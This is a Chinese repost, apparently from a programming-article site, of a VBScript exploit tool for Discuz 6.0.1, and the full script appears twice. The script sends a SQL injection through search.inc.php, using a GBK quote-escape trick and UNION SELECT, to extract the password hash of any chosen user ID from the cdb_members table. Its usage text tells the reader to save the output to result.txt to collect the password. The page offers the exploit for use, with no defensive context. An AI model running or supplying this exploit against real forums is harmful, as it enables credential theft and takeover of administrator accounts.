discuz获取任意管理员密码漏洞利用工具vbs版
程序员文章站
2022-03-19 15:56:28
以下是search.inc.php 文件漏洞利用代码VBS版
[code]
Dim strUrl,strSite,strPath,strUid
showB()
Set Args = Wscript.Arguments
If Args.Count <> 3 Then
ShowU()
Else... 09-04-18...
以下是search.inc.php 文件漏洞利用代码vbs版
dim strurl,strsite,strpath,struid
showb()
set args = wscript.arguments
if args.count <> 3 then
showu()
else
strsite=args(0)
strpath=args(1)
struid=args(2)
end if
strurl="action=search&searchid=22%cf' union select 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & struid &"/*&do=submit"
set objxml = createobject("microsoft.xmlhttp")
objxml.open "post",strsite & strpath & "index.php", false
objxml.setrequestheader "accept", "*/*"
objxml.setrequestheader "accept-language", "zh-cn"
objxml.setrequestheader "content-type", "application/x-www-form-urlencoded"
objxml.setrequestheader "user-agent", "wap"
objxml.send(strurl)
wscript.echo(objxml.responsetext)
sub showb()
with wscript
.echo("+--------------------------=====================------------------------------+")
.echo("exploit discuz6.0.1")
.echo("code by safe3")
.echo("+--------------------------=====================------------------------------+")
end with
end sub
sub showu()
with wscript
.echo("+--------------------------=====================------------------------------+")
.echo("用法:")
.echo(" cscript "&.scriptname&" site path uid")
.echo("例子:")
.echo(" cscript "&.scriptname&" http://www.example.com/ /forum/ 1 >result.txt")
.echo("+--------------------------=====================------------------------------+")
.quit
end with
end sub
获得的密码大家自己在result.txt中查找
复制代码
代码如下:dim strurl,strsite,strpath,struid
showb()
set args = wscript.arguments
if args.count <> 3 then
showu()
else
strsite=args(0)
strpath=args(1)
struid=args(2)
end if
strurl="action=search&searchid=22%cf' union select 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & struid &"/*&do=submit"
set objxml = createobject("microsoft.xmlhttp")
objxml.open "post",strsite & strpath & "index.php", false
objxml.setrequestheader "accept", "*/*"
objxml.setrequestheader "accept-language", "zh-cn"
objxml.setrequestheader "content-type", "application/x-www-form-urlencoded"
objxml.setrequestheader "user-agent", "wap"
objxml.send(strurl)
wscript.echo(objxml.responsetext)
sub showb()
with wscript
.echo("+--------------------------=====================------------------------------+")
.echo("exploit discuz6.0.1")
.echo("code by safe3")
.echo("+--------------------------=====================------------------------------+")
end with
end sub
sub showu()
with wscript
.echo("+--------------------------=====================------------------------------+")
.echo("用法:")
.echo(" cscript "&.scriptname&" site path uid")
.echo("例子:")
.echo(" cscript "&.scriptname&" http://www.example.com/ /forum/ 1 >result.txt")
.echo("+--------------------------=====================------------------------------+")
.quit
end with
end sub
获得的密码大家自己在result.txt中查找
上一篇: 单例模式的几种实现方式